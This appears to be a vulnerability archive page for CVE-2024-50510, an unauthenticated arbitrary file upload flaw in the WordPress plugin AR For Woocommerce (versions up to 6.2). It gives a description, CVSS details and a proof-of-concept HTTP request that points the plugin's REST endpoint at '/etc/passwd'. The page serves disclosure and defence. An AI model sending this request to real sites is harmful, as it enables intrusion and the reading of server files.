Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

POC Details: 4eed2bbe4c40097981326b10ce4e2bc7cd8a4e7e

Source
Associated Vulnerability
Title:WordPress plugin AR For Woocommerce 代码问题漏洞 (CVE-2024-50510)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin AR For Woocommerce 6.2版本及之前版本存在代码问题漏洞,该漏洞源于不受限制的文件上传漏洞。
Description
AR For Woocommerce <= 6.2 - Unauthenticated Arbitrary File Upload
Readme
# CVE-2024-50510
AR For Woocommerce <= 6.2 - Unauthenticated Arbitrary File Upload

# Description

The AR for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 6.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

## Details

- **Type**: plugin
- **Slug**: ar-for-woocommerce
- **Affected Version**: 6.2
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-50510
- **Status**: Active

POC
---

```
POST /wp-json/ar-wc-display/featuredimage/ HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/json
Content-Length: 41

{"id":123,"featured_image":"/etc/passwd"}
```
File Snapshot

[4.0K] /data/pocs/4eed2bbe4c40097981326b10ce4e2bc7cd8a4e7e └── [ 854] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.